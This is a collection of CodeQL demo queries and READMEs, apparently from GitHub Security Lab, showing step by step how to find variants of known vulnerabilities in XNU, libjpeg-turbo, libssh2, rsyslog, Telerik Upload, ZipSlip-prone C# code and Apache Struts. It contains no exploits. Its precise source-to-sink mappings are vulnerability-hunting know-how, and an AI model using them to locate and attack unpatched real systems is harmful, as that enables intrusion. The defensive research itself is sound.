13 | The queries also find results in [this newer snapshot for 10.13.3](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong.
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name tcphdr flow to mbuf_copydata
3 | * @description Expressions of type tcphdr usually contain values that can
4 | * be controlled by an attacker. Therefore, it is dangerous to
5 | * use any of those values as the size argument of
6 | * mbuf_copydata.
7 | * @kind path-problem
8 | * @problem.severity warning
9 | * @id apple-xnu/cpp/tcphdr_mbuf_copydata
10 | */
11 |
12 | import cpp
13 | import semmle.code.cpp.dataflow.TaintTracking
14 | import DataFlow::PathGraph
15 |
16 | class Config extends TaintTracking::Configuration {
17 | Config() { this = "tcphdr_flow" }
18 |
19 | override predicate isSource(DataFlow::Node source) {
20 | source.asExpr().getType().stripType().getName() = "tcphdr"
21 | }
22 |
23 | override predicate isSink(DataFlow::Node sink) {
24 | exists (FunctionCall call
25 | | call.getArgument(2) = sink.asExpr() and
26 | call.getTarget().getName() = "mbuf_copydata")
27 | }
28 | }
29 |
30 | from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
31 | where cfg.hasFlowPath(source, sink)
32 | select sink, source, sink, "tcp"
33 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | // Find expressions of the form `base->colormap[i][j]`
4 |
5 | from ArrayExpr outer, ArrayExpr inner
6 | where inner = outer.getArrayBase() and
7 | inner.getArrayBase().(FieldAccess).getTarget().getName() = "colormap"
8 | select outer, "Indexing into colormap."
9 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
3 | import semmle.code.cpp.controlflow.Guards
4 | import Options
5 |
6 | // Find expressions of the form `base->colormap[i][j]` where
7 | // `j` is checked against `base->cmap_length`
8 |
9 | /**
10 | * Gets an expression of the form `base->fieldName`, where `base`
11 | * is of type `_bmp_source_struct`.
12 | */
13 | Expr bmpSourceStructField(GVN base, string fieldName) {
14 | exists (FieldAccess fa |
15 | fa.getTarget().getName() = fieldName and
16 | fa.getTarget().getDeclaringType().hasName("_bmp_source_struct") and
17 | base = globalValueNumber(fa.getQualifier()) and
18 | globalValueNumber(result) = globalValueNumber(fa)
19 | )
20 | }
21 |
22 | from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index
23 | where inner = outer.getArrayBase() and
24 | inner.getArrayBase() = bmpSourceStructField(base, "colormap") and
25 | outer.getArrayOffset() = index.getAnExpr() and
26 | exists (GuardCondition gc, Expr bound |
27 | bound = bmpSourceStructField(base, "cmap_length") and
28 | gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true)
29 | )
30 | select outer, "Guarded indexing into colormap."
31 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/00_error_codes.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00_error_codes
3 | */
4 |
5 | import cpp
6 |
7 | // Look for return statements that return a negative integer constant.
8 | // For example:
9 | //
10 | // return -1;
11 | //
12 | // The negative return value might be an error code.
13 | from ReturnStmt ret
14 | where ret.getExpr().getValue().toInt() < 0
15 | select ret
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/01_error_codes_call.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_error_codes_call
3 | */
4 |
5 | import cpp
6 |
7 | // Extend the previous query to also find calls to functions that sometimes
8 | // return a negative integer constant.
9 | from FunctionCall call, ReturnStmt ret
10 | where
11 | ret.getExpr().getValue().toInt() < 0 and
12 | call.getTarget() = ret.getEnclosingFunction()
13 | select ret, call
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_eating_error_codes
3 | */
4 |
5 | import cpp
6 |
7 | // Look for calls that are cast to unsigned, which means that the error
8 | // code might be accidentally ignored.
9 | from FunctionCall call, ReturnStmt ret
10 | where
11 | ret.getExpr().getValue().toInt() < 0 and
12 | call.getTarget() = ret.getEnclosingFunction() and
13 | call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned()
14 | select call, ret
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_eating_error_codes_localflow
3 | */
4 |
5 | import cpp
6 | import semmle.code.cpp.dataflow.DataFlow
7 |
8 | // The previous query only handled cases where the result of the function
9 | // call is immediately cast to unsigned. So it will fail to detect examples
10 | // like this, where the cast doesn't happen immediately:
11 | //
12 | // int r = f();
13 | // unsigned int x = r;
14 | //
15 | // In this query, we add local dataflow so that we can also handle such
16 | // cases.
17 | from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink
18 | where
19 | ret.getExpr().getValue().toInt() < 0 and
20 | call.getTarget() = ret.getEnclosingFunction() and
21 | source.asExpr() = call and
22 | DataFlow::localFlow(source, sink) and
23 | sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned()
24 | select source, sink
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_eating_error_codes_localflow_rangeanalysis
3 | */
4 |
5 | import cpp
6 | import semmle.code.cpp.dataflow.DataFlow
7 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
8 |
9 | // The previous query produced some weird results. The problem is that it
10 | // treats any expression with an unsigned type as a potential sink. What we
11 | // really want is to find where the cast from signed to unsigned happens,
12 | // because that's where the integer overflow occurs. So we want the sink to
13 | // be a potentially negative expression that gets cast to unsigned.
14 | //
15 | // Note that by using range analysis, we can avoid producing false positive
16 | // results for examples like this:
17 | //
18 | // int r = f();
19 | // if (r < 0) return -1;
20 | // unsigned int x = r;
21 | from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink
22 | where
23 | ret.getExpr().getValue().toInt() < 0 and
24 | call.getTarget() = ret.getEnclosingFunction() and
25 | source.asExpr() = call and
26 | DataFlow::localFlow(source, sink) and
27 | sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and
28 | lowerBound(sink.asExpr()) < 0
29 | select source, sink
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md:
--------------------------------------------------------------------------------
1 | # Eating error codes in libssh2
2 |
3 | Download this [snapshot](https://github.com/github/securitylab/releases/download/libssh2-codeql-database/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
4 |
5 | This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released.
6 |
7 | The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
8 |
9 | For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis.
10 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-cpp
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-cpp
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /*
4 | * Find all calls to `snprintf`.
5 | *
6 | * Note: you could do this first step with grep. However,
7 | * grep is less good because it doesn't know about macros.
8 | * For example, curl does this:
9 | *
10 | * https://github.com/curl/curl/blob/87501e57f1c166cb250111af54e0470ab8b2099c/lib/curl_printf.h#L42
11 | */
12 | from FunctionCall call
13 | where call.getTarget().getName() = "snprintf"
14 | select call
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /*
4 | * Only code that uses the result of snprintf might be vulnerable.
5 | * So restrict the results to those where snprintf is not used
6 | * in a "void context".
7 | */
8 | from FunctionCall call
9 | where call.getTarget().getName() = "snprintf"
10 | and not call instanceof ExprInVoidContext
11 | select call
12 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /*
4 | * Only calls to `snprintf` with `%s` in the format specifier
5 | * are likely to be vulnerable. This is because other format
6 | * specifiers, like `%d` can only change the length of the output
7 | * string by a few character, but `%s` can change it a lot.
8 | * A `%s` specifier is also much more likely to enable an attacker
9 | * to overwrite the stack or heap with working shellcode.
10 | */
11 | from FunctionCall call
12 | where call.getTarget().getName() = "snprintf"
13 | and not call instanceof ExprInVoidContext
14 | and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*")
15 | select call
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
4 | /*
5 | * Look for dataflow from the result of `snprintf` back to
6 | * its size argument. Note that we no longer need the
7 | * `call instanceof ExprInVoidContext` clause, because this
8 | * is implied by the dataflow.
9 | */
10 | from FunctionCall call, DataFlow::Node source, DataFlow::Node sink
11 | where call.getTarget().getName() = "snprintf"
12 | and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*")
13 | and TaintTracking::localTaint(source, sink)
14 | and source.asExpr() = call
15 | and sink.asExpr() = call.getArgument(1)
16 | select call
17 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
3 | import semmle.code.cpp.dataflow.TaintTracking
4 |
5 | /*
6 | * Use `SimpleRangeAnalysis` to find an upper bound for the size
7 | * argument. Here, we have just added the upperbound to the output,
8 | * but we could also use it to rule out code that does proper bounds
9 | * checking.
10 | *
11 | * Note: it can also be interesting to add the upperbound to the
12 | * query earlier in the sequence of queries, so that you can see
13 | * that it infers quite tight bounds for some of the calls.
14 | */
15 | from FunctionCall call, DataFlow::Node source, DataFlow::Node sink
16 | where call.getTarget().getName() = "snprintf"
17 | and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*")
18 | and TaintTracking::localTaint(source, sink)
19 | and source.asExpr() = call
20 | and sink.asExpr() = call.getArgument(1)
21 | select call, upperBound(call.getArgument(1).getFullyConverted())
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).
2 |
3 | This bug was found by one of [CodeQL](https://codeql.github.com/) default queries. However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query.
4 |
5 | Use [this snapshot](https://github.com/github/securitylab/releases/download/rsyslog-codeql-database/rsyslog-all-revision-2018-April-27--14-12-31.zip).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/README.md:
--------------------------------------------------------------------------------
1 | # Rsyslog demo video
2 |
3 | A recording of this demo can be found [here](https://youtu.be/gfaCZoxH_u4).
4 |
5 | `rsyslog.srt` (in this directory) is the subtitles file for the video.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/01_find_data_input.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class ReadFunctionCall extends FunctionCall {
4 | ReadFunctionCall() {
5 | this.getTarget().getName() = "pread" or
6 | this.getTarget().getName() = "read" or
7 | this.getTarget().getName() = "readv" or
8 | this.getTarget().getName() = "recvfrom" or
9 | this.getTarget().getName() = "recvmsg" or
10 | this.getTarget().getName() = "recv"
11 | }
12 | }
13 |
14 | from ReadFunctionCall call
15 | select call.getFile(), call.getEnclosingFunction(), call
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/02_find_data_pointer_usage.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class RawMessageFieldAccess extends FieldAccess {
4 | RawMessageFieldAccess() {
5 | this.getTarget().getName() = "pszRawMsg"
6 | }
7 | }
8 |
9 | class RawMsgAccessFunction extends Function {
10 | RawMsgAccessFunction() {
11 | any(RawMessageFieldAccess access).getEnclosingFunction() = this
12 | }
13 | }
14 |
15 | from RawMsgAccessFunction access
16 | select access.getFile(), access
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/03_find_data_pointer_usage_extended.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class RawMessageFieldAccess extends FieldAccess {
4 | RawMessageFieldAccess() {
5 | this.getTarget().getName() = "pszRawMsg"
6 | }
7 | }
8 |
9 | class RawMsgAccessFunction extends Function {
10 | RawMsgAccessFunction() {
11 | any(RawMessageFieldAccess access).getEnclosingFunction() = this
12 | or
13 | exists(
14 | FunctionCall call |
15 | call.getEnclosingFunction() = this and (
16 | call.getTarget().getName() = "getMSG" or
17 | call.getTarget().getName() = "getRawMsg"
18 | )
19 | )
20 | }
21 | }
22 |
23 | from RawMsgAccessFunction access
24 | select access.getFile(), access
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/04_find_parsers.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | class ParseFunction extends Function {
4 | ParseFunction() {
5 | this.getName() = "parse" or
6 | this.getName() = "parse2"
7 | }
8 | }
9 |
10 | from ParseFunction parse
11 | select parse.getFile(), parse
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/05_find_tainted_iterations.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 | import semmle.code.cpp.dataflow.TaintTracking
4 |
5 | class RawMessageFieldAccess extends FieldAccess {
6 | RawMessageFieldAccess() {
7 | this.getTarget().getName() = "pszRawMsg"
8 | }
9 | }
10 |
11 | from DataFlow::Node source, DataFlow::Node sink, RawMessageFieldAccess access, WhileStmt loop
12 | where
13 | TaintTracking::localTaint(source, sink) and
14 | source.asExpr() = access and
15 | sink.asExpr() = loop.getCondition().getAChild*()
16 | select "Loop iterates data from:", source, sink
17 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/README.md:
--------------------------------------------------------------------------------
1 | # Bug Hunting with CodeQL, an rsyslog Case Study
2 |
3 | This repo contains the CodeQL queries used in the [Bug Hunting with CodeQL, an rsyslog Case Study](https://securitylab.github.com/research/bug-hunting-codeql-rsyslog) blog post.
4 |
5 | - [Discovering program input](01_find_data_input.ql)
6 | - [Data flow exploration](02_find_data_pointer_usage.ql)
7 | - [Data flow exploration (extended)](03_find_data_pointer_usage_extended.ql)
8 | - [Finding data parsers](04_find_parsers.ql)
9 | - [Finding tainted loops](05_find_tainted_iterations.ql)
10 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-csharp
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.csharp.library
5 |
6 | com.semmle.code.csharp.dbscheme
7 |
8 | csharp
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/TelerikRepeatedEncryptionKey/TelerikRepeatedEncryptionKey.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Non unique encryption keys in Telerik Upload in ASP.NET
3 | * @description Setting a weak encryption key for ASP.NET Telerik Upload may allow attacks against
4 | * the application.
5 | * @kind problem
6 | */
7 |
8 | import csharp
9 |
10 | from XMLAttribute a, XMLAttribute b
11 | where
12 | a.getName() = "key" and
13 | a.getValue() = "Telerik.AsyncUpload.ConfigurationEncryptionKey" and
14 | b.getName() = "key" and
15 | b.getValue() = "Telerik.Upload.ConfigurationHashKey" and
16 | a.getElement().getAttributeValue("value") = b.getElement().getAttributeValue("value")
17 | select a,
18 | "Non unique (duplicated) Telerik Upload encryption key (" +
19 | a.getElement().getAttributeValue("value").toString() + ")."
20 |
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/01_Sources.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
3 | from Property p
4 | where p.hasName("FullName")
5 | select p.getAnAccess()
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/02_Sources.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
3 | from Property p
4 | where
5 | p.hasName("FullName") and
6 | p.getDeclaringType().hasName("ZipArchiveEntry")
7 | select p.getAnAccess()
8 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/03_Sinks.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
3 | from MethodCall c
4 | where c.getTarget().hasName("ExtractToFile")
5 | select c
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/04_SinkArgument.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
3 | from MethodCall c
4 | where c.getTarget().hasName("ExtractToFile")
5 | select c.getArgument(1)
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/05_LocalFlow.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 | import semmle.code.csharp.dataflow.TaintTracking
3 |
4 | from DataFlow::Node source, DataFlow::Node sink, MethodCall c, Property p
5 | where
6 | c.getTarget().hasName("ExtractToFile") and
7 | p.hasName("FullName") and
8 | p.getDeclaringType().hasName("ZipArchiveEntry") and
9 | sink.asExpr() = c.getAnArgument() and
10 | source.asExpr() = p.getAnAccess() and
11 | TaintTracking::localTaint(source, sink)
12 | select sink, "ZipSlip from $@.", source, source.toString()
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/06_GlobalFlow.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 | import semmle.code.csharp.dataflow.TaintTracking
3 |
4 | class ZipSlipTaintTracking extends TaintTracking::Configuration {
5 | ZipSlipTaintTracking() { this = "Zip Slip taint tracking" }
6 |
7 | override predicate isSource(DataFlow::Node node) {
8 | exists(Property p |
9 | p.hasName("FullName") and
10 | p.getDeclaringType().hasName("ZipArchiveEntry") and
11 | node.asExpr() = p.getAnAccess()
12 | )
13 | }
14 |
15 | override predicate isSink(DataFlow::Node node) {
16 | exists(MethodCall call | call.getTarget().hasName("ExtractToFile") |
17 | node.asExpr() = call.getAnArgument()
18 | )
19 | }
20 | }
21 |
22 | from ZipSlipTaintTracking config, DataFlow::Node source, DataFlow::Node sink
23 | where config.hasFlow(source, sink)
24 | select sink, "Zip Slip vulnerability from $@.", source, source.toString()
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-csharp
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-csharp
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-java
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.java.library
5 |
6 | com.semmle.code.java.dbscheme
7 |
8 | java
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/)
2 |
3 | [This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug.
4 |
5 | This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`.
6 |
7 | The query is based on an earlier version of one of our default queries: `UnsafeDeserialization.ql`. When Mo discovered the vulnerability, the standard query did not detect the problem. But Mo realized by studying previous vulnerabilities in Struts that [ContentTypeHandler](http://struts.apache.org/maven/struts2-plugins/struts2-rest-plugin/apidocs/org/apache/struts2/rest/handler/ContentTypeHandler.html) is a source of untrusted input in Struts, so he modified the query to make it a taint source. With that modification, the query found the RCE vulnerability. Our Java team have since improved `UnsafeDeserialization.ql` so that it is able to detect this vulnerability, so this is a great example of how the work of the Semmle Security Team helps to improve our queries for all our users. It is interesting to compare the result of Mo's query with the new default query, which you can find in the directory `Security/CWE/CWE-502/`. The source found by the default query is buried deeper in the library than the one found by Mo's query.
8 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_compileAndExecute
3 | */
4 |
5 | import java
6 |
7 | /* Find the method named "compileAndExecute". This method is used
8 | * to execute OGNL, so it is going to be the sink of our dataflow
9 | * analysis.
10 | */
11 | from Method m
12 | where m.getName() = "compileAndExecute"
13 | select m
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_compileAndExecute
3 | */
4 |
5 | import java
6 |
7 | /* Find calls to "compileAndExecute". */
8 | from Method m, MethodAccess ma
9 | where
10 | m.getName() = "compileAndExecute" and
11 | ma.getMethod() = m
12 | select m, ma
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_compileAndExecute
3 | */
4 |
5 | import java
6 |
7 | /* We are actually interested in argument 0 of compileAndExecute,
8 | * because that's the string that will get executed.
9 | */
10 | from Method m, MethodAccess ma
11 | where
12 | m.getName() = "compileAndExecute" and
13 | ma.getMethod() = m
14 | select ma.getArgument(0)
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_compileAndExecute
3 | */
4 |
5 | import java
6 |
7 | /* Refactor the logic into a predicate. */
8 | predicate isOgnlSink(Expr arg) {
9 | exists (Method m, MethodAccess ma
10 | | m.getName() = "compileAndExecute" and
11 | ma.getMethod() = m and
12 | arg = ma.getArgument(0))
13 | }
14 |
15 | /* This query produces identical results to the previous one. We have just
16 | * refactored the logic into a separate predicate.
17 | */
18 | from Expr arg
19 | where isOgnlSink(arg)
20 | select arg
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 05_getNamespace
3 | */
4 |
5 | import java
6 |
7 | /* This predicate is currently unused, but we will need it again later. */
8 | predicate isOgnlSink(Expr arg) {
9 | exists (Method m, MethodAccess ma
10 | | m.getName() = "compileAndExecute" and
11 | ma.getMethod() = m and
12 | arg = ma.getArgument(0))
13 | }
14 |
15 | /* Find methods named "getNamespace". */
16 | from Method m
17 | where m.getName() = "getNamespace"
18 | select m
19 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 06_getNamespace
3 | */
4 |
5 | import java
6 |
7 | predicate isOgnlSink(Expr arg) {
8 | exists (Method m, MethodAccess ma
9 | | m.getName() = "compileAndExecute" and
10 | ma.getMethod() = m and
11 | arg = ma.getArgument(0))
12 | }
13 |
14 | /* We are only interested in methods that override ActionProxy::getNamespace. */
15 | from Method m, Method n
16 | where
17 | m.getName() = "getNamespace" and
18 | m.getDeclaringType().getName() = "ActionProxy" and
19 | n.overrides*(m)
20 | select n
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 07_getNamespace
3 | */
4 |
5 | import java
6 |
7 | predicate isOgnlSink(Expr arg) {
8 | exists (Method m, MethodAccess ma
9 | | m.getName() = "compileAndExecute" and
10 | ma.getMethod() = m and
11 | arg = ma.getArgument(0))
12 | }
13 |
14 | /* Find calls to getNamespace. */
15 | from Method m, Method n, MethodAccess ma
16 | where
17 | m.getName() = "getNamespace" and
18 | m.getDeclaringType().getName() = "ActionProxy" and
19 | n.overrides*(m) and
20 | ma.getMethod() = n
21 | select ma
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 08_getNamespace
3 | */
4 |
5 | import java
6 |
7 | predicate isOgnlSink(Expr arg) {
8 | exists (Method m, MethodAccess ma
9 | | m.getName() = "compileAndExecute" and
10 | ma.getMethod() = m and
11 | arg = ma.getArgument(0))
12 | }
13 |
14 | /* Refactor the logic into a predicate. */
15 | predicate isActionProxySource(MethodAccess ma) {
16 | exists (Method m, Method n
17 | | m.getName() = "getNamespace" and
18 | m.getDeclaringType().getName() = "ActionProxy" and
19 | n.overrides*(m) and
20 | ma.getMethod() = n)
21 | }
22 |
23 | /* This query produces identical results to the previous one. We have just
24 | * refactored the logic into a separate predicate.
25 | */
26 | from MethodAccess ma
27 | where isActionProxySource(ma)
28 | select ma
29 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 09_dataflow
3 | * @kind path-problem
4 | */
5 |
6 | import java
7 | import semmle.code.java.dataflow.DataFlow
8 | import DataFlow::PathGraph
9 |
10 | predicate isOgnlSink(Expr arg) {
11 | exists (Method m, MethodAccess ma
12 | | m.getName() = "compileAndExecute" and
13 | ma.getMethod() = m and
14 | arg = ma.getArgument(0))
15 | }
16 |
17 | predicate isActionProxySource(MethodAccess ma) {
18 | exists (Method m, Method n
19 | | m.getName() = "getNamespace" and
20 | m.getDeclaringType().getName() = "ActionProxy" and
21 | n.overrides*(m) and
22 | ma.getMethod() = n)
23 | }
24 |
25 | class OgnlCfg extends DataFlow::Configuration {
26 | OgnlCfg() { this = "ognl" }
27 |
28 | override predicate isSource(DataFlow::Node source) {
29 | isActionProxySource(source.asExpr())
30 | }
31 |
32 | override predicate isSink(DataFlow::Node sink) {
33 | isOgnlSink(sink.asExpr())
34 | }
35 | }
36 |
37 | /* First version of the dataflow query. We use isActionProxySource
38 | * as the source and isOgnlSink as the sink.
39 | */
40 | from OgnlCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink
41 | where cfg.hasFlowPath(source, sink)
42 | select source, source, sink, "ognl"
43 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md:
--------------------------------------------------------------------------------
1 | # Apache Struts CVE-2018-11776
2 |
3 | [Blog post](https://securitylab.github.com/research/apache-struts-CVE-2018-11776/)
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
6 |
7 | The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
8 |
9 | # Suggested workflow
10 |
11 | * First run the [final query](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
12 | ** Show the result in the path viewer.
13 | * Show how to build a similar query step by step.
14 | ** We will build a slightly simplified version of the query, so it won't find as many results, but it still finds one of the RCEs.
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-java
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-java
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/.project:
